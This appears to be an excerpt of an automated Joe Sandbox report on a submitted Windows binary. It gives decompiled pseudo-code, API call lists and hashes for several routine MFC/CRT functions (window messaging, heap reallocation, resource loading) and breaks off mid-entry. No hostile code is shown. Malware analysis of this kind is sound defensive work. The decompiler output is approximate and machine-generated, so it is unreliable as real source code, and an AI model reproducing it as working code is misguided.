      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$CtrlH_prolog3MessageSend
      • String ID:
      • API String ID: 849854284-0
      • Opcode ID: 78649379a3463eb3544cd2344868c35cca5bad3ac3a575101081f0b0fdb9cea7
      • Instruction ID: fe85f0ec31d3e27b1220e9633717f3d176a18feba0d485eff6385b31a9ae9958
      • Opcode Fuzzy Hash: 78649379a3463eb3544cd2344868c35cca5bad3ac3a575101081f0b0fdb9cea7
      • Instruction Fuzzy Hash: 9121A271902218AEDF24EBA4DD84FEEBA78FF96310F104259F453A2490EB704E40CBA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A6EE5 Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMON
      Download Yara Rule
      C-Code - Quality: 68%
      			E009A6EE5(void* __ecx, unsigned int _a4) {
				void* __ebp;
				struct HWND__* _t20;
				void* _t23;
				void* _t27;
				void* _t34;
				struct HWND__* _t35;

				_t28 = __ecx;
				_t34 = __ecx;
				if((E009B0A7A(__ecx) & 0x40000000) == 0) {
					_t28 = __ecx;
					_t27 = E009AD852(__ecx);
				} else {
					_t27 = __ecx;
				}
				if(_t27 == 0) {
					E009B8782(_t28);
				}
				if((_a4 & 0x0000000c) != 0) {
					_t23 = E009B0BF8(_t27);
					if(( !(_a4 >> 3) & 0x00000001) == 0 || _t23 == 0 || _t27 == _t34) {
						SendMessageA( *(_t27 + 0x20), 0x86, 0, 0);
					} else {
						 *(_t34 + 0x58) =  *(_t34 + 0x58) | 0x00000200;
						SendMessageA( *(_t27 + 0x20), 0x86, 1, 0);
						 *(_t34 + 0x58) =  *(_t34 + 0x58) & 0xfffffdff;
					}
				}
				_push(5);
				_push(GetDesktopWindow());
				while(1) {
					_t20 = GetWindow();
					_t35 = _t20;
					if(_t35 == 0) {
						break;
					}
					if(E009A64A1( *(_t27 + 0x20), _t35) != 0) {
						SendMessageA(_t35, 0x36d, _a4, 0);
					}
					_push(2);
					_push(_t35);
				}
				return _t20;
			}









      0x009a6ee5
      0x009a6eed
      0x009a6ef9
      0x009a6eff
      0x009a6f06
      0x009a6efb
      0x009a6efb
      0x009a6efb
      0x009a6f0a
      0x009a6f0c
      0x009a6f0c
      0x009a6f1b
      0x009a6f1f
      0x009a6f2f
      0x009a6f63
      0x009a6f39
      0x009a6f39
      0x009a6f4c
      0x009a6f4e
      0x009a6f4e
      0x009a6f2f
      0x009a6f65
      0x009a6f6d
      0x009a6f8d
      0x009a6f8d
      0x009a6f93
      0x009a6f97
      0x00000000
      0x00000000
      0x009a6f7b
      0x009a6f88
      0x009a6f88
      0x009a6f8a
      0x009a6f8c
      0x009a6f8c
      0x009a6f9d

      APIs
        • Part of subcall function 009B0A7A: GetWindowLongA.USER32 ref: 009B0A85
      • SendMessageA.USER32 ref: 009A6F4C
      • SendMessageA.USER32 ref: 009A6F63
      • GetDesktopWindow.USER32 ref: 009A6F67
      • SendMessageA.USER32 ref: 009A6F88
      • GetWindow.USER32(00000000), ref: 009A6F8D
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: MessageSendWindow$DesktopLong
      • String ID:
      • API String ID: 2272707703-0
      • Opcode ID: 4483101dcc1c27393aac645e70c2d3338a53840ea4650bfd15b708354d5a09f8
      • Instruction ID: 2258057b9c5b68be9147bce08981e18632b7c83ff93953da1ef6319ae0f43f01
      • Opcode Fuzzy Hash: 4483101dcc1c27393aac645e70c2d3338a53840ea4650bfd15b708354d5a09f8
      • Instruction Fuzzy Hash: 88110A313407557FEB316B559C86F9B3B5CAF82B64F290125FA06690E1CF95DC0086D0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00AAFE97 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
      Download Yara Rule
      C-Code - Quality: 94%
      			E00AAFE97(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t27;
				long _t30;

				if(_a4 != 0) {
					_push(__esi);
					_t30 = _a8;
					__eflags = _t30;
					if(_t30 != 0) {
						_push(__edi);
						while(1) {
							__eflags = _t30 - 0xffffffe0;
							if(_t30 > 0xffffffe0) {
								break;
							}
							__eflags = _t30;
							if(_t30 == 0) {
								_t30 = _t30 + 1;
								__eflags = _t30;
							}
							_t7 = HeapReAlloc( *0xd13a24, 0, _a4, _t30);
							_t27 = _t7;
							__eflags = _t27;
							if(_t27 != 0) {
								L17:
								_t8 = _t27;
							} else {
								__eflags =  *0xd142e8 - _t7;
								if(__eflags == 0) {
									_t9 = E00AADB06(__eflags);
									 *_t9 = E00AADAC4(GetLastError());
									goto L17;
								} else {
									__eflags = E00AB6403(_t7, _t30);
									if(__eflags == 0) {
										_t12 = E00AADB06(__eflags);
										 *_t12 = E00AADAC4(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00AB6403(_t6, _t30);
						 *((intOrPtr*)(E00AADB06(__eflags))) = 0xc;
						goto L12;
					} else {
						E00AAB4AB(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00AACF9B(__edx, __edi, __esi, _a8);
				}
			}









      0x00aafea0
      0x00aafead
      0x00aafeae
      0x00aafeb1
      0x00aafeb3
      0x00aafec2
      0x00aafef5
      0x00aafef5
      0x00aafef8
      0x00000000
      0x00000000
      0x00aafec5
      0x00aafec7
      0x00aafec9
      0x00aafec9
      0x00aafec9
      0x00aafed6
      0x00aafedc
      0x00aafede
      0x00aafee0
      0x00aaff40
      0x00aaff40
      0x00aafee2
      0x00aafee2
      0x00aafee8
      0x00aaff2a
      0x00aaff3e
      0x00000000
      0x00aafeea
      0x00aafef1
      0x00aafef3
      0x00aaff12
      0x00aaff26
      0x00aaff0c
      0x00aaff0c
      0x00aaff0c
      0x00000000
      0x00000000
      0x00000000
      0x00aafef3
      0x00aafee8
      0x00000000
      0x00aaff0e
      0x00aafefb
      0x00aaff06
      0x00000000
      0x00aafeb5
      0x00aafeb8
      0x00aafebe
      0x00aafebe
      0x00aaff0f
      0x00aaff11
      0x00aafea2
      0x00aafeac
      0x00aafeac

      APIs
      • _malloc.LIBCMT ref: 00AAFEA5
        • Part of subcall function 00AACF9B: __FF_MSGBANNER.LIBCMT ref: 00AACFB4
        • Part of subcall function 00AACF9B: __NMSG_WRITE.LIBCMT ref: 00AACFBB
        • Part of subcall function 00AACF9B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00AB4D5B,00000000,00000001,00000000,?,00AB501C,00000018,00B19770,0000000C,00AB50AC), ref: 00AACFE0
      • _free.LIBCMT ref: 00AAFEB8
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AllocateHeap_free_malloc
      • String ID:
      • API String ID: 1020059152-0
      • Opcode ID: c6b137aacc4d4bc291093d83299fbeb8d1ac105a06486add407fa2b2fa0c39f5
      • Instruction ID: fb0e068b4179478cff97fcf15b5b3d4ef83967e326d89c5cceca5d29e9244e52
      • Opcode Fuzzy Hash: c6b137aacc4d4bc291093d83299fbeb8d1ac105a06486add407fa2b2fa0c39f5
      • Instruction Fuzzy Hash: 6911CA324046116FCF366BF4AD0569E37A59F473B1B258436F456D71E2EF34CC8286A4
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A77B8 Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON
      Download Yara Rule
      C-Code - Quality: 65%
      			E009A77B8(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __eflags, struct HWND__* _a4, unsigned int _a8) {
				signed int _v8;
				char _v268;
				struct HWND__* _v272;
				intOrPtr _v276;
				void* __esi;
				void* __ebp;
				signed int _t22;
				int _t28;
				unsigned int _t48;
				void* _t51;
				void* _t54;
				intOrPtr _t55;
				void* _t56;
				signed int _t60;

				_t52 = __edi;
				_t51 = __edx;
				_t42 = __ebx;
				_t58 = _t60;
				_t22 =  *0xd0c910; // 0x3a0e8b0c
				_v8 = _t22 ^ _t60;
				_push(_t54);
				_v276 = __ecx;
				_v272 = _a4;
				_t55 =  *((intOrPtr*)(E009BD77F(__ebx, __edi, _t54, __eflags) + 4));
				if(_t55 != 0 && _a8 != 0) {
					_t48 = _a8 >> 0x10;
					if(_t48 != 0) {
						_t28 =  *(_t55 + 0x98) & 0x0000ffff;
						if(_a8 == _t28 && _t48 ==  *(_t55 + 0x9a)) {
							_push(__ebx);
							_push(__edi);
							GlobalGetAtomNameA(_t28,  &_v268, 0x103);
							GlobalAddAtomA( &_v268);
							GlobalGetAtomNameA( *(_t55 + 0x9a) & 0x0000ffff,  &_v268, 0x103);
							GlobalAddAtomA( &_v268);
							SendMessageA(_v272, 0x3e4,  *(_v276 + 0x20), ( *(_t55 + 0x9a) & 0x0000ffff) << 0x00000010 |  *(_t55 + 0x98) & 0x0000ffff);
							_pop(_t52);
							_pop(_t42);
						}
					}
				}
				_pop(_t56);
				return E00AAB46A(0, _t42, _v8 ^ _t58, _t51, _t52, _t56);
			}

















      0x009a77b8
      0x009a77b8
      0x009a77b8
      0x009a77bb
      0x009a77c3
      0x009a77ca
      0x009a77d0
      0x009a77d1
      0x009a77d7
      0x009a77e2
      0x009a77e7
      0x009a77fb
      0x009a7801
      0x009a7807
      0x009a7812
      0x009a781d
      0x009a781e
      0x009a7832
      0x009a7841
      0x009a7857
      0x009a7860
      0x009a788a
      0x009a7890
      0x009a7891
      0x009a7891
      0x009a7812
      0x009a7801
      0x009a7899
      0x009a78a0

      APIs
      • GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 009A7832
      • GlobalAddAtomA.KERNEL32 ref: 009A7841
      • GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 009A7857
      • GlobalAddAtomA.KERNEL32 ref: 009A7860
      • SendMessageA.USER32 ref: 009A788A
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AtomGlobal$Name$MessageSend
      • String ID:
      • API String ID: 1515195355-0
      • Opcode ID: 89540e5766252372b0a5834b933bb7ceab2af91552c751fc52a7c66cb8bbc651
      • Instruction ID: 872a7be22e195ed9c85bd2dd9b3409474cab63d41dc2c7deed1813cdca23fc1c
      • Opcode Fuzzy Hash: 89540e5766252372b0a5834b933bb7ceab2af91552c751fc52a7c66cb8bbc651
      • Instruction Fuzzy Hash: F9216275900218AACB24DFA9CC45AEAB3F8EB59300F00855AE599D7141D7B49EC4CF94
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B91C1 Relevance: 7.6, APIs: 5, Instructions: 65windowCOMMONLIBRARYCODE
      Download Yara Rule
      C-Code - Quality: 91%
      			E009B91C1(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int _a4, intOrPtr _a8, char _a12) {
				intOrPtr* _v0;
				signed int _v4;
				signed int _v8;
				signed int _v16;
				intOrPtr* _t26;
				void* _t33;
				void* _t36;
				signed int _t39;
				signed int _t42;
				void* _t48;

				_t48 = __eflags;
				_t36 = __ebx;
				E00AAD232(0xad0a5c, __ebx, __edi, __esi);
				_t42 = E009A6291(_t48, 0xc);
				_t39 = 4;
				_v16 = _t42;
				_v4 = _v4 & 0x00000000;
				if(_t42 == 0) {
					_t42 = 0;
					__eflags = 0;
				} else {
					_t39 = _t42;
					E009B879E(_t39);
					 *(_t42 + 8) =  *(_t42 + 8) & 0x00000000;
					 *_t42 = 0xad9dc0;
				}
				_v8 = _v8 | 0xffffffff;
				 *(_t42 + 8) = _a4;
				_a4 = _t42;
				E00AAB8C9( &_a4, 0xb0ca34);
				asm("int3");
				_t26 = _v0;
				_push(_t36);
				if(_t26 != 0) {
					 *_t26 = 0;
				}
				if(FormatMessageA(0x1100, 0,  *(_t39 + 8), 0x800,  &_a12, 0, 0) != 0) {
					E009A6677(_t39, E00AAF0A3(_a4, _a8, _a12, 0xffffffff));
					LocalFree(_a12);
					_t33 = 1;
					__eflags = 1;
				} else {
					 *_a4 = 0;
					_t33 = 0;
				}
				return _t33;
			}













      0x009b91c1
      0x009b91c1
      0x009b91c8
      0x009b91d4
      0x009b91d6
      0x009b91d7
      0x009b91da
      0x009b91e0
      0x009b91f5
      0x009b91f5
      0x009b91e2
      0x009b91e2
      0x009b91e4
      0x009b91e9
      0x009b91ed
      0x009b91ed
      0x009b91fa
      0x009b91fe
      0x009b920a
      0x009b920d
      0x009b9212
      0x009b9218
      0x009b921b
      0x009b9220
      0x009b9222
      0x009b9222
      0x009b9240
      0x009b925c
      0x009b9267
      0x009b926f
      0x009b926f
      0x009b9242
      0x009b9245
      0x009b9247
      0x009b9247
      0x009b9272

      APIs
      • __EH_prolog3.LIBCMT ref: 009B91C8
        • Part of subcall function 009A6291: _malloc.LIBCMT ref: 009A62AF
      • __CxxThrowException@8.LIBCMT ref: 009B920D
      • FormatMessageA.KERNEL32(00001100,00000000,?,00000800,009B9E3B,00000000,00000000,00000000,?,009B9E3B,00B0CA34,00000004,009A5508,009B9E3B,?,009B9E3B), ref: 009B9238
      • __cftof.LIBCMT ref: 009B9256
      • LocalFree.KERNEL32(009B9E3B,009A5508,009B9E3B,?,009B9E3B), ref: 009B9267
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow__cftof_malloc
      • String ID:
      • API String ID: 1808948168-0
      • Opcode ID: 7613d5c61e47362c5e281cf4d9ef360feb3c39bfd156c892f9020870dd40c9c2
      • Instruction ID: acbffb8ddc25ec5d375a45902a9b2f933542184d84e653b48ed8dbec2f9b3fc2
      • Opcode Fuzzy Hash: 7613d5c61e47362c5e281cf4d9ef360feb3c39bfd156c892f9020870dd40c9c2
      • Instruction Fuzzy Hash: 5911D3B2514249BFDB11DFA4CC85BAE7BA8BF05320F104529FA658A291D771D900C790
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009BB926 Relevance: 7.6, APIs: 5, Instructions: 54stringCOMMON
      Download Yara Rule
      C-Code - Quality: 75%
      			E009BB926(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
				signed int _v8;
				char _v263;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HWND__* _t22;
				intOrPtr _t23;
				void* _t24;
				intOrPtr _t27;
				int _t29;
				intOrPtr _t30;
				CHAR* _t32;
				intOrPtr _t33;
				signed int _t37;

				_t27 = __edx;
				_t24 = __ecx;
				_t35 = _t37;
				_t9 =  *0xd0c910; // 0x3a0e8b0c
				_v8 = _t9 ^ _t37;
				_t22 = _a4;
				_t32 = _a8;
				if(_t22 == 0) {
					L2:
					E009B8782(_t24);
				}
				if(_t32 == 0) {
					goto L2;
				}
				_t29 = lstrlenA(_t32);
				_v264 = 0;
				E00AAB3F0( &_v263, 0, 0xff);
				if(_t29 > 0x100 || GetWindowTextA(_t22,  &_v264, 0x100) != _t29 || lstrcmpA( &_v264, _t32) != 0) {
					_t16 = SetWindowTextA(_t22, _t32);
				}
				_pop(_t30);
				_pop(_t33);
				_pop(_t23);
				return E00AAB46A(_t16, _t23, _v8 ^ _t35, _t27, _t30, _t33);
			}




















      0x009bb926
      0x009bb926
      0x009bb929
      0x009bb931
      0x009bb938
      0x009bb93c
      0x009bb940
      0x009bb946
      0x009bb948
      0x009bb948
      0x009bb948
      0x009bb94f
      0x00000000
      0x00000000
      0x009bb95d
      0x009bb968
      0x009bb96f
      0x009bb97e
      0x009bb9a7
      0x009bb9a7
      0x009bb9b0
      0x009bb9b1
      0x009bb9b4
      0x009bb9bb

      APIs
      • lstrlenA.KERNEL32(?,?,?,?), ref: 009BB952
      • _memset.LIBCMT ref: 009BB96F
      • GetWindowTextA.USER32 ref: 009BB989
      • lstrcmpA.KERNEL32(00000000,?,?,?,?), ref: 009BB99B
      • SetWindowTextA.USER32(?,?), ref: 009BB9A7
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
      • String ID:
      • API String ID: 289641511-0
      • Opcode ID: 420a9713d89638e22edb5afb235d41b57fc0d16a042232085ea7a4bb4865523c
      • Instruction ID: 922d0e83ddd9aa2363053393422f57248ea4332bf427e859b5287bfdbe8fdc54
      • Opcode Fuzzy Hash: 420a9713d89638e22edb5afb235d41b57fc0d16a042232085ea7a4bb4865523c
      • Instruction Fuzzy Hash: 9C0104B66012186BD720EB64DE85FDF776CEF49754F040065FA06D3181DBB0DE408B60
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00A39DE8 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
      Download Yara Rule
      C-Code - Quality: 87%
      			E00A39DE8(void* __ebx, intOrPtr __ecx, void* __edx, CHAR* _a4, void* _a8) {
				intOrPtr _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t9;
				void* _t10;
				void* _t16;
				void* _t17;
				void* _t21;
				void* _t22;
				struct HRSRC__* _t23;
				struct HINSTANCE__* _t26;
				void* _t28;

				_t21 = __edx;
				_t16 = __ebx;
				_push(__ecx);
				_t26 = _a8;
				_push(_t22);
				_v8 = __ecx;
				_t29 = _t26;
				if(_t26 == 0) {
					_t26 =  *(E009BD77F(__ebx, _t22, _t26, _t29) + 0xc);
				}
				_t23 = FindResourceA(_t26, _a4,  *0xd11ecc);
				if(_t23 != 0) {
					_t9 = LoadResource(_t26, _t23);
					_a8 = _t9;
					__eflags = _t9;
					if(_t9 == 0) {
						goto L3;
					}
					_push(_t16);
					_t17 = LockResource(_t9);
					__eflags = _t17;
					if(_t17 != 0) {
						_t28 = E00A39D16(_v8, _t21, _t23, _t17, SizeofResource(_t26, _t23));
					} else {
						_t28 = 0;
						__eflags = 0;
					}
					FreeResource(_a8);
					_t10 = _t28;
					goto L4;
				} else {
					L3:
					_t10 = 0;
					L4:
					return _t10;
				}
			}
















      0x00a39de8
      0x00a39de8
      0x00a39ded
      0x00a39def
      0x00a39df2
      0x00a39df3
      0x00a39df6
      0x00a39df8
      0x00a39dff
      0x00a39dff
      0x00a39e12
      0x00a39e16
      0x00a39e22
      0x00a39e28
      0x00a39e2b
      0x00a39e2d
      0x00000000
      0x00000000
      0x00a39e2f
      0x00a39e37
      0x00a39e39
      0x00a39e3b
      0x00a39e5f
      0x00a39e3d
      0x00a39e3d
      0x00a39e3d
      0x00a39e3d
      0x00a39e42
      0x00a39e48
      0x00000000
      0x00a39e18
      0x00a39e18
      0x00a39e18
      0x00a39e1a
      0x00a39e1d
      0x00a39e1d

      APIs
      • FindResourceA.KERNEL32(?,?,76C46910), ref: 00A39E0C
      • LoadResource.KERNEL32(?,00000000,?,00A3BCA6,?,?,?,00000084,00A3C07A,0000000A,0000000A,0000000A,00000000,00000014,00A0AA38,00000004), ref: 00A39E22
      • LockResource.KERNEL32(00000000,?,?,00A3BCA6,?,?,?,00000084,00A3C07A,0000000A,0000000A,0000000A,00000000,00000014,00A0AA38,00000004), ref: 00A39E31
      • FreeResource.KERNEL32(?,00000000,00000000,?,?,00A3BCA6,?,?,?,00000084,00A3C07A,0000000A,0000000A,0000000A,00000000,00000014), ref: 00A39E42
      • SizeofResource.KERNEL32(?,00000000,?,?,00A3BCA6,?,?,?,00000084,00A3C07A,0000000A,0000000A,0000000A,00000000,00000014,00A0AA38), ref: 00A39E4F
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Resource$FindFreeLoadLockSizeof
      • String ID:
      • API String ID: 4159136517-0
      • Opcode ID: c2ba00598a162110c823128ebd392b237bdf0a27cce41d58875bbffa779e1d40
      • Instruction ID: 75a70f5d736e843a7f745992a1ed4fdc8fb909e6b9e47f8dca36693c4cb8c00d
      • Opcode Fuzzy Hash: c2ba00598a162110c823128ebd392b237bdf0a27cce41d58875bbffa779e1d40
      • Instruction Fuzzy Hash: CC018F7A501711BF8B11ABA5DD4989B7BACEF95361B218016FD0297211DBB4DD01CBB0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A6D4B Relevance: 7.5, APIs: 5, Instructions: 48windowCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E009A6D4B(void* __ecx) {
				struct tagMSG _v32;
				void* __ebp;
				void* _t9;
				void* _t13;
				void* _t26;

				_t26 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x88)) != 0) {
					if(PeekMessageA( &_v32,  *(__ecx + 0x20), 0x367, 0x367, 3) == 0) {
						PostMessageA( *(_t26 + 0x20), 0x367, 0, 0);
					}
					if(GetCapture() ==  *(_t26 + 0x20)) {
						ReleaseCapture();
					}
					_t13 = E009AD852(_t26);
					if(_t13 == 0) {
						_t13 = E009B8782(0);
					}
					 *((intOrPtr*)(_t26 + 0x88)) = 0;
					 *((intOrPtr*)(_t13 + 0x88)) = 0;
					return PostMessageA( *(_t26 + 0x20), 0x36a, 0, 0);
				}
				return _t9;
			}








      0x009a6d54
      0x009a6d5d
      0x009a6d7f
      0x009a6d89
      0x009a6d89
      0x009a6d94
      0x009a6d96
      0x009a6d96
      0x009a6d9e
      0x009a6da7
      0x009a6da9
      0x009a6da9
      0x009a6db0
      0x009a6dbb
      0x00000000
      0x009a6dc7
      0x009a6dca

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Message$CapturePost$PeekRelease
      • String ID:
      • API String ID: 1125932295-0
